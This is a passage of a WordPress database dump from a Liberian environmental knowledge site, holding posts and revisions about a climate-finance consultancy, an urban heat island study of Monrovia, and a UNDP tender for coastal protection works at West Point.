objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/10/Contractual-Service-Inclusive-Finance-Specialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Contractual Service (National Consultant)','','publish','closed','closed','','contractual-service-national-consultant','','','2025-10-27 10:50:13','2025-10-27 10:50:13','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5622',37,'ekms_bulletin','',0),(5623,38,'2025-10-27 10:48:59','2025-10-27 10:48:59','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\nClick to:','Contractual Service (National Consultant)','','inherit','closed','closed','','5622-revision-v1','','','2025-10-27 10:48:59','2025-10-27 10:48:59','',5622,'https://ekmsliberia.info/?p=5623',0,'revision','',0),(5624,38,'2025-10-27 10:49:18','2025-10-27 10:49:18','','Contractual Service-Inclusive Finance Specialist','','inherit','open','closed','','contractual-service-inclusive-finance-specialist','','','2025-10-27 10:49:18','2025-10-27 10:49:18','',0,'https://ekmsliberia.info/wp-content/uploads/2025/10/Contractual-Service-Inclusive-Finance-Specialist.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5625,38,'2025-10-27 10:50:13','2025-10-27 10:50:13','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/10/Contractual-Service-Inclusive-Finance-Specialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Contractual Service (National Consultant)','','inherit','closed','closed','','5622-revision-v1','','','2025-10-27 10:50:13','2025-10-27 10:50:13','',5622,'https://ekmsliberia.info/?p=5625',0,'revision','',0),(5626,38,'2025-10-31 17:03:29','2025-10-31 17:03:29','<div class=\"page\" title=\"Page 4\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Introduction</strong>\r\n\r\nUrbanization and climate change pose significant challenges to cities worldwide, increasing problems related to heat stress (Tamball et al 2024). Urban heat islands occur when city landscapes\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nof asphalt, concrete, and buildings absorb and re-emit more heat than vegetated or rural areas, causing urban temperatures to rise above those of surrounding regions. Monrovia, the capital of Liberia, has a tropical climate and is one of the wettest capital cities, with high humidity and consistently warm temperatures year-round. Over the past decades, Greater Monrovia has undergone rapid urban expansion, driven by population growth and rural-to-urban migration, resulting in extensive land-use/land-cover changes (Brian 2024). This development has led to the replacement of natural landscapes (such as forests, wetlands, and open green spaces) with impervious surfaces and dense built-up areas. As a result, the UHI effect is emerging in Monrovia: urban neighborhoods experience noticeably higher temperatures than greener or less built-up areas, especially during the day.\r\n\r\nRecent analyses underscore this local trend. A geospatial study of Greater Monrovia found that built-up land cover increased dramatically from about 14.6% in 1991 to 36.1% by 2020, while vegetated areas shrank significantly (Brian 2024). Correspondingly, land surface temperatures in heavily built parts of the city have risen. The same study noted that mean LST in dense urban neighborhoods reached around 42°C, compared to roughly 33–37°C in vegetated areas and about 30°C over water bodies (Brian 2024). In other words, surfaces in built-up Monrovia can be nearly 9°C hotter than those in nearby green or water-covered zones during peak heating periods. Such data, though limited, confirms that an urban heat island effect is taking hold in Monrovia, likely exacerbated by the decline of urban green cover and the increase in concrete and asphalt surfaces. This is consistent with global observations that impervious urban surfaces absorb and retain solar energy, creating localized heating (Brian 2024).\r\n\r\nThe impacts of rising urban heat in Monrovia are a growing concern. Higher ambient temperatures contribute to heat stress for residents, potentially leading to adverse health effects (heat exhaustion, heat stroke, exacerbated medical conditions) and reduced outdoor comfort (Tamball et al 2024). They can also increase energy demand for cooling, straining electricity supply and raising costs for a city where access to power and air conditioning is limited for many. In general, heat islands have been linked to increased air pollution (as stagnant hot air can worsen smog) and even impacts on water quality due to heated runoff. Vulnerable groups, such as the elderly, young children, and low-income households in densely populated informal settlements are at particular risk from extreme heat and lack of cooling options. Monrovia’s coastal location means high humidity, which\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 6\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\ncan make the heat index (or “felt” heat) very severe even if air temperatures are moderately high (Climate risk profile report, 2024).\r\n\r\n</div>\r\n</div>\r\n</div>','Assessing Urban Heat Island in Liberia','','publish','closed','closed','','assessing-urban-heat-island-in-liberia','','','2025-10-31 17:06:28','2025-10-31 17:06:28','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5626',14,'document','',0),(5627,38,'2025-10-31 16:58:16','2025-10-31 16:58:16','','Screenshot 2025-10-31 at 13.42.43','','inherit','open','closed','','screenshot-2025-10-31-at-13-42-43','','','2025-10-31 16:58:16','2025-10-31 16:58:16','',5626,'https://ekmsliberia.info/wp-content/uploads/2025/10/Screenshot-2025-10-31-at-13.42.43.png',0,'attachment','image/png',0),(5628,38,'2025-10-31 16:59:17','2025-10-31 16:59:17','','UHI study report final','','inherit','open','closed','','uhi-study-report-final','','','2025-10-31 16:59:17','2025-10-31 16:59:17','',5626,'https://ekmsliberia.info/wp-content/uploads/2025/10/UHI-study-report-final.pdf',0,'attachment','application/pdf',0),(5629,38,'2025-10-31 17:03:29','2025-10-31 17:03:29','<div class=\"page\" title=\"Page 4\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Introduction</strong>\r\n\r\nUrbanization and climate change pose significant challenges to cities worldwide, increasing problems related to heat stress (Tamball et al 2024). Urban heat islands occur when city landscapes\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nof asphalt, concrete, and buildings absorb and re-emit more heat than vegetated or rural areas, causing urban temperatures to rise above those of surrounding regions. Monrovia, the capital of Liberia, has a tropical climate and is one of the wettest capital cities, with high humidity and consistently warm temperatures year-round. Over the past decades, Greater Monrovia has undergone rapid urban expansion, driven by population growth and rural-to-urban migration, resulting in extensive land-use/land-cover changes (Brian 2024). This development has led to the replacement of natural landscapes (such as forests, wetlands, and open green spaces) with impervious surfaces and dense built-up areas. As a result, the UHI effect is emerging in Monrovia: urban neighborhoods experience noticeably higher temperatures than greener or less built-up areas, especially during the day.\r\n\r\nRecent analyses underscore this local trend. A geospatial study of Greater Monrovia found that built-up land cover increased dramatically from about 14.6% in 1991 to 36.1% by 2020, while vegetated areas shrank significantly (Brian 2024). Correspondingly, land surface temperatures in heavily built parts of the city have risen. The same study noted that mean LST in dense urban neighborhoods reached around 42°C, compared to roughly 33–37°C in vegetated areas and about 30°C over water bodies (Brian 2024). In other words, surfaces in built-up Monrovia can be nearly 9°C hotter than those in nearby green or water-covered zones during peak heating periods. Such data, though limited, confirms that an urban heat island effect is taking hold in Monrovia, likely exacerbated by the decline of urban green cover and the increase in concrete and asphalt surfaces. This is consistent with global observations that impervious urban surfaces absorb and retain solar energy, creating localized heating (Brian 2024).\r\n\r\nThe impacts of rising urban heat in Monrovia are a growing concern. Higher ambient temperatures contribute to heat stress for residents, potentially leading to adverse health effects (heat exhaustion, heat stroke, exacerbated medical conditions) and reduced outdoor comfort (Tamball et al 2024). They can also increase energy demand for cooling, straining electricity supply and raising costs for a city where access to power and air conditioning is limited for many. In general, heat islands have been linked to increased air pollution (as stagnant hot air can worsen smog) and even impacts on water quality due to heated runoff. Vulnerable groups, such as the elderly, young children, and low-income households in densely populated informal settlements are at particular risk from extreme heat and lack of cooling options. Monrovia’s coastal location means high humidity, which\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 6\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\ncan make the heat index (or “felt” heat) very severe even if air temperatures are moderately high (Climate risk profile report, 2024).\r\n\r\n</div>\r\n</div>\r\n</div>','Assessing Urban Heat Island in Liberia','','inherit','closed','closed','','5626-revision-v1','','','2025-10-31 17:03:29','2025-10-31 17:03:29','',5626,'https://ekmsliberia.info/?p=5629',0,'revision','',0),(5631,38,'2025-11-11 16:49:08','2025-11-11 16:49:08','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians’ fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\n\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations\r\n\r\nDevelopment Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the United Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed through a grant from GCF and co-finance from UNDP and GoL. The core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. This will be achieved through three outputs, namely:\r\n\r\n&nbsp;\r\n\r\nOutput 1: Protection of coastal communities and infrastructure at West Point against erosion\r\n\r\ncaused by sea-level rise and increasingly frequent high-intensity storms;\r\n\r\nOutput 2: Institutional capacity building and policy support for the implementation of\r\n\r\nIntegrated Coastal Zone Management (ICZM) across Liberia; and\r\n\r\nOutput 3: Protection of mangroves and strengthening of gender- and climate-sensitive\r\n\r\nlivelihoods to build local climate resilience in Monrovia (Output 3).\r\n\r\n&nbsp;\r\n\r\nThe project is expected to enhance coastal protection, foster improved coastal management and\r\n\r\npresent local communities with diversified climate-resilient livelihoods. The project interventions of coastal protection, comprehensive, long-term planning for coastal zone management and the strengthening of local livelihoods — in conjunction with strong awareness-raising and knowledge management considerations — will address both the immediate and long-term impacts of climate change on the coast of Monrovia and facilitate the potential for up-scaling these initiatives across Liberia. The Project will also catalyze a paradigm shift in the management of Monrovia’s coastal zone towards an integrated, transformative and proactive approach that addresses current and anticipated climate change risks and which mixes both infrastructure (where necessary) and coastal ecosystems in adaptation efforts.\r\n\r\nThe Environmental Protection Agency (EPA) is the principal authority in Liberia responsible for the management of the environment and natural resources and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources. The EPA, in close collaboration with the Ministry of Mines and Energy (MME), Ministry of Finance and Development Planning (MFDP), the Ministry of Public Works (MPW) are implementing the MMCRP through a Project Management Unit, based at the EPA. The UNDP, as an Accredited Entity to the GCF are providing oversight and quality assurance services to the MMCRP. The project Management Unit (PMU) is responsible for the implementation of the Project with support from the EPA and UNDP.\r\n\r\nUnder Output 1, the project intends to construct a combination of coastal protection structures (a\r\n\r\nrevetment and a breakwater) and associated amenities (a green promenade and trees) to protect West Point against climate-induced sea level rise and high-intensity storms. Therefore, a conceptual design was prepared as an output of the Engineering Sub-assessment done during project preparation.\r\n\r\n&nbsp;\r\n\r\nHowever, to mitigate any adverse flooding effects due to the construction of the aforementioned\r\n\r\nstructures, a project site-specific hydro-engineering study of West Point was conducted by qualified engineers to ensure that the risks of potential localized and broader flooding are incorporated in the detailed design of the defense structure. The final technical design was based on the existing conceptual design and considered best practices and lessons learned from other coastal protection interventions in Monrovia and elsewhere. This final design has also been informed by detailed geo-physical and social assessments, including an options analysis of nature- based solutions and other hard infrastructure options, and solicited the inputs of communities. Preventing both heavier water loads in the Mesurado Estuary and saline intrusion into freshwater aquifers were critical considerations in this initial design of this intervention. Notwithstanding, a critical aspect of ensuring a successful implementation is to have a realistic construction plan. Hence, a construction plan was developed after producing the detailed technical designs. The construction plan has identified all necessary inputs, construction packages, procurement procedures, contracting guidelines, relevant legislation, environmental and social safeguards (ESS) processes and gender- responsive stakeholder consultations. The final detailed technical design and construction plan considered input from community and government stakeholders and were validated.\r\n\r\n&nbsp;\r\n\r\nAn Environmental and Social Impact Assessment (ESIA) was conducted concurrently and informed the final detailed design of the revetment. The development of the Livelihood Restoration Plan (LRP), a sub-plan of the ESIA meant to mitigate the risk of economic displacement due to the construction, is about to commence and will be completed before construction starts. This is in accordance with the requirements of Liberian law, the funded activity agreement (FAA) for the project, and the project document; and follows the recommendations of the Environmental and Social Assessment Report (ESAR) which was submitted along with the funding proposal.\r\n\r\n&nbsp;\r\n\r\nThe complete tender package has been finalized and is being used to recruit a suitable <strong>international engineering firm</strong> to construct the coastal protection structures and associated amenities. See link below for more information:\r\n\r\n<u><a href=\"https://procurement-notices.undp.org/view_negotiation.cfm?nego_id=40374\">Procurement Notices - UNDP-LBR-00817 - Civil Works for Coastal protection structure &amp; Breakwater in Monrovia, Liberia</a></u>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Civil Works for Coastal protection structure & Breakwater in Monrovia, Liberia','','publish','closed','closed','','international-engineering-firm-to-construct-the-coastal-protection-structures-and-associated-amenities','','','2025-11-11 19:42:17','2025-11-11 19:42:17','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5631',36,'ekms_bulletin','',0),(5632,38,'2025-11-11 16:49:08','2025-11-11 16:49:08','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise\r\nand the increased frequency of high-intensity storms. This has resulted in coastal erosion and\r\nshoreline retreat, which threatens the sustainability of ecosystem services and directly impacts\r\nMonrovians’ fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are\r\nwomen.\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate\r\nrisks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations\r\nDevelopment Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience\r\nProject (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing\r\nEntity for the project, and the United Nations Development Programme (UNDP) is the\r\nAccredited Entity. The MMCRP is financed through a grant from GCF and co-finance from\r\nUNDP and GoL. The core aim of the Project is to build the long-term climate resilience of\r\ncoastal communities in Liberia by both addressing immediate adaptation priorities and creating\r\nan enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia\r\nand Liberia. This will be achieved through three outputs, namely:\r\n\r\n Output 1: Protection of coastal communities and infrastructure at West Point against erosion\r\ncaused by sea-level rise and increasingly frequent high-intensity storms;\r\n Output 2: Institutional capacity building and policy support for the implementation of\r\nIntegrated Coastal Zone Management (ICZM) across Liberia; and\r\n\r\n Output 3: Protection of mangroves and strengthening of gender- and climate-sensitive\r\nlivelihoods to build local climate resilience in Monrovia (Output 3).\r\n\r\nThe project is expected to enhance coastal protection, foster improved coastal management and\r\npresent local communities with diversified climate-resilient livelihoods. The project\r\ninterventions of coastal protection, comprehensive, long-term planning for coastal zone\r\nmanagement and the strengthening of local livelihoods — in conjunction with strong awareness-\r\nraising and knowledge management considerations — will address both the immediate and long-\r\nterm impacts of climate change on the coast of Monrovia and facilitate the potential for up-\r\nscaling these initiatives across Liberia. The Project will also catalyze a paradigm shift in the\r\nmanagement of Monrovia’s coastal zone towards an integrated, transformative and proactive\r\napproach that addresses current and anticipated climate change risks and which mixes both\r\ninfrastructure (where necessary) and coastal ecosystems in adaptation efforts.\r\n\r\nClikck :<a href=\"http://Procurement Notices - UNDP-LBR-00817 - Civil Works for Coastal protection structure &amp;amp; Breakwater in Monrovia, Liberia\" target=\"_blank\" rel=\"noopener\">To Aply</a>','international engineering firm to construct the coastal protection structures and associated amenities.','','inherit','closed','closed','','5631-revision-v1','','','2025-11-11 16:49:08','2025-11-11 16:49:08','',5631,'https://ekmsliberia.info/?p=5632',0,'revision','',0),(5633,38,'2025-11-11 16:50:39','2025-11-11 16:50:39','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise\r\nand the increased frequency of high-intensity storms. This has resulted in coastal erosion and\r\nshoreline retreat, which threatens the sustainability of ecosystem services and directly impacts\r\nMonrovians’ fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are\r\nwomen.\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate\r\nrisks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations\r\nDevelopment Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience\r\nProject (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing\r\nEntity for the project, and the United Nations Development Programme (UNDP) is the\r\nAccredited Entity. The MMCRP is financed through a grant from GCF and co-finance from\r\nUNDP and GoL. The core aim of the Project is to build the long-term climate resilience of\r\ncoastal communities in Liberia by both addressing immediate adaptation priorities and creating\r\nan enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia\r\nand Liberia. This will be achieved through three outputs, namely:\r\n\r\n Output 1: Protection of coastal communities and infrastructure at West Point against erosion\r\ncaused by sea-level rise and increasingly frequent high-intensity storms;\r\n Output 2: Institutional capacity building and policy support for the implementation of\r\nIntegrated Coastal Zone Management (ICZM) across Liberia; and\r\n\r\n Output 3: Protection of mangroves and strengthening of gender- and climate-sensitive\r\nlivelihoods to build local climate resilience in Monrovia (Output 3).\r\n\r\nThe project is expected to enhance coastal protection, foster improved coastal management and\r\npresent local communities with diversified climate-resilient livelihoods. The project\r\ninterventions of coastal protection, comprehensive, long-term planning for coastal zone\r\nmanagement and the strengthening of local livelihoods — in conjunction with strong awareness-\r\nraising and knowledge management considerations — will address both the immediate and long-\r\nterm impacts of climate change on the coast of Monrovia and facilitate the potential for up-\r\nscaling these initiatives across Liberia. The Project will also catalyze a paradigm shift in the\r\nmanagement of Monrovia’s coastal zone towards an integrated, transformative and proactive\r\napproach that addresses current and anticipated climate change risks and which mixes both\r\ninfrastructure (where necessary) and coastal ecosystems in adaptation efforts.\r\n\r\nThe Environmental Protection Agency (EPA) is the principal authority in Liberia responsible for\r\nthe management of the environment and natural resources and is empowered to coordinate,\r\nmonitor, supervise and consult with relevant stakeholders on all activities in the protection of the\r\nenvironment and sustainable use of natural resources. The EPA, in close collaboration with the\r\nMinistry of Mines and Energy (MME), Ministry of Finance and Development Planning (MFDP),\r\nthe Ministry of Public Works (MPW) are implementing the MMCRP through a Project\r\nManagement Unit, based at the EPA. The UNDP, as an Accredited Entity to the GCF are\r\nproviding oversight and quality assurance services to the MMCRP. The project Management\r\nUnit (PMU) is responsible for the implementation of the Project with support from the EPA and\r\nUNDP.\r\n\r\nUnder Output 1, the project intends to construct a combination of coastal protection structures (a\r\nrevetment and a breakwater) and associated amenities (a green promenade and trees) to protect\r\nWest Point against climate-induced sea level rise and high-intensity storms. Therefore, a\r\nconceptual design was prepared as an output of the Engineering Sub-assessment done during\r\nproject preparation.\r\nHowever, to mitigate any adverse flooding effects due to the construction of the aforementioned\r\nstructures, a project site-specific hydro-engineering study of West Point was conducted by\r\nqualified engineers to ensure that the risks of potential localized and broader flooding are\r\nincorporated in the detailed design of the defense structure. The final technical design was based\r\non the existing conceptual design and considered best practices and lessons learned from other\r\ncoastal protection interventions in Monrovia and elsewhere. This final design has also been\r\ninformed by detailed geo-physical and social assessments, including an options analysis of\r\nnature- based solutions and other hard infrastructure options, and solicited the inputs of\r\ncommunities. Preventing both heavier water loads in the Mesurado Estuary and saline intrusion\r\ninto freshwater aquifers were critical considerations in this initial design of this intervention.\r\nNotwithstanding, a critical aspect of ensuring a successful implementation is to have a realistic\r\nconstruction plan. Hence, a construction plan was developed after producing the detailed\r\ntechnical designs. The construction plan has identified all necessary inputs, construction\r\npackages, procurement procedures, contracting guidelines, relevant legislation, environmental\r\nand social safeguards (ESS) processes and gender- responsive stakeholder consultations. The\r\nfinal detailed technical design and construction plan considered input from community and\r\ngovernment stakeholders and were validated.\r\nAn Environmental and Social Impact Assessment (ESIA) was conducted concurrently and\r\ninformed the final detailed design of the revetment. The development of the Livelihood\r\nRestoration Plan (LRP), a sub-plan of the ESIA meant to mitigate the risk of economic\r\ndisplacement due to the construction, is about to commence and will be completed before\r\nconstruction starts. This is in accordance with the requirements of Liberian law, the funded\r\nactivity agreement (FAA) for the project, and the project document; and follows the\r\nrecommendations of the Environmental and Social Assessment Report (ESAR) which was\r\nsubmitted along with the funding proposal.\r\nThe complete tender package has been finalized and is being used to recruit a suitable\r\ninternational engineering firm to construct the coastal protection structures and associated\r\namenities. See link below for more information:\r\n\r\nClikck :<a href=\"http://Procurement Notices - UNDP-LBR-00817 - Civil Works for Coastal protection structure &amp;amp; Breakwater in Monrovia, Liberia\" target=\"_blank\" rel=\"noopener\">To Aply</a>','international engineering firm to construct the coastal protection structures and associated amenities.','','inherit','closed','closed','','5631-revision-v1','','','2025-11-11 16:50:39','2025-11-11 16:50:39','',5631,'https://ekmsliberia.info/?p=5633',0,'revision','',0),(5634,38,'2026-06-17 16:15:12','2026-06-17 16:15:12','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians’ fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\n\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations\n\nDevelopment Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the United Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed through a grant from GCF and co-finance from UNDP and GoL. The core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. This will be achieved through three outputs, namely:\n\n&nbsp;\n\nOutput 1: Protection of coastal communities and infrastructure at West Point against erosion\n\ncaused by sea-level rise and increasingly frequent high-intensity storms;\n\nOutput 2: Institutional capacity building and policy support for the implementation of\n\nIntegrated Coastal Zone Management (ICZM) across Liberia; and\n\nOutput 3: Protection of mangroves and strengthening of gender- and climate-sensitive\n\nlivelihoods to build local climate resilience in Monrovia (Output 3).\n\n&nbsp;\n\nThe project is expected to enhance coastal protection, foster improved coastal management and\n\npresent local communities with diversified climate-resilient livelihoods. The project interventions of coastal protection, comprehensive, long-term planning for coastal zone management and the strengthening of local livelihoods — in conjunction with strong awareness-raising and knowledge management considerations — will address both the immediate and long-term impacts of climate change on the coast of Monrovia and facilitate the potential for up-scaling these initiatives across Liberia. The Project will also catalyze a paradigm shift in the management of Monrovia’s coastal zone towards an integrated, transformative and proactive approach that addresses current and anticipated climate change risks and which mixes both infrastructure (where necessary) and coastal ecosystems in adaptation efforts.\n\nThe Environmental Protection Agency (EPA) is the principal authority in Liberia responsible for the management of the environment and natural resources and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources. The EPA, in close collaboration with the Ministry of Mines and Energy (MME), Ministry of Finance and Development Planning (MFDP), the Ministry of Public Works (MPW) are implementing the MMCRP through a Project Management Unit, based at the EPA. The UNDP, as an Accredited Entity to the GCF are providing oversight and quality assurance services to the MMCRP. The project Management Unit (PMU) is responsible for the implementation of the Project with support from the EPA and UNDP.\n\nUnder Output 1, the project intends to construct a combination of coastal protection structures (a\n\nrevetment and a breakwater) and associated amenities (a green promenade and trees) to protect West Point against climate-induced sea level rise and high-intensity storms. Therefore, a conceptual design was prepared as an output of the Engineering Sub-assessment done during project preparation.\n\n&nbsp;\n\nHowever, to mitigate any adverse flooding effects due to the construction of the aforementioned\n\nstructures, a project site-specific hydro-engineering study of West Point was conducted by qualified engineers to ensure that the risks of potential localized and broader flooding are incorporated in the detailed design of the defense structure. The final technical design was based on the existing conceptual design and considered best practices and lessons learned from other coastal protection interventions in Monrovia and elsewhere. This final design has also been informed by detailed geo-physical and social assessments, including an options analysis of nature- based solutions and other hard infrastructure options, and solicited the inputs of communities. Preventing both heavier water loads in the Mesurado Estuary and saline intrusion into freshwater aquifers were critical considerations in this initial design of this intervention. Notwithstanding, a critical aspect of ensuring a successful implementation is to have a realistic construction plan. Hence, a construction plan was developed after producing the detailed technical designs. The construction plan has identified all necessary inputs, construction packages, procurement procedures, contracting guidelines, relevant legislation, environmental and social safeguards (ESS) processes and gender- responsive stakeholder consultations. The final detailed technical design and construction plan considered input from community and government stakeholders and were validated.\n\n&nbsp;\n\nAn Environmental and Social Impact Assessment (ESIA) was conducted concurrently and informed the final detailed design of the revetment. The development of the Livelihood Restoration Plan (LRP), a sub-plan of the ESIA meant to mitigate the risk of economic displacement due to the construction, is about to commence and will be completed before construction starts. This is in accordance with the requirements of Liberian law, the funded activity agreement (FAA) for the project, and the project document; and follows the recommendations of the Environmental and Social Assessment Report (ESAR) which was submitted along with the funding proposal.\n\n&nbsp;\n\nThe complete tender package has been finalized and is being used to recruit a suitable <strong>international engineering firm</strong> to construct the coastal protection structures and associated amenities. See link below for more information:\n\n<u><a href=\"https://procurement-notices.undp.org/view_negotiation.cfm?nego_id=40374\">Procurement Notices - UNDP-LBR-00817 - Civil Works for Coastal protection structure &amp; Breakwater in Monrovia, Liberia</a></u>\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','','','inherit','closed','closed','','5631-autosave-v1','','','2026-06-17 16:15:12','2026-06-17 16:15:12','',5631,'https://ekmsliberia.info/?p=5634',0,'revision','',0),(5970,38,'2026-06-17 16:39:56','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2026-06-17 16:39:56','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?p=5970',0,'post','',0),(5635,38,'2025-11-11 19:42:17','2025-11-11 19:42:17','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians’ fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\n\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations\r\n\r\nDevelopment Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the United Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed through a grant from GCF and co-finance from UNDP and GoL. The core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. This will be achieved through three outputs, namely:\r\n\r\n&nbsp;\r\n\r\nOutput 1: Protection of coastal communities and infrastructure at West Point against erosion\r\n\r\ncaused by sea-level rise and increasingly frequent high-intensity storms;\r\n\r\nOutput 2: Institutional capacity building and policy support for the implementation of\r\n\r\nIntegrated Coastal Zone Management (ICZM) across Liberia; and\r\n\r\nOutput 3: Protection of mangroves and strengthening of gender- and climate-sensitive\r\n\r\nlivelihoods to build local climate resilience in Monrovia (Output 3).\r\n\r\n&nbsp;\r\n\r\nThe project is expected to enhance coastal protection, foster improved coastal management and\r\n\r\npresent local communities with diversified climate-resilient livelihoods. The project interventions of coastal protection, comprehensive, long-term planning for coastal zone management and the strengthening of local livelihoods — in conjunction with strong awareness-raising and knowledge management considerations — will address both the immediate and long-term impacts of climate change on the coast of Monrovia and facilitate the potential for up-scaling these initiatives across Liberia. The Project will also catalyze a paradigm shift in the management of Monrovia’s coastal zone towards an integrated, transformative and proactive 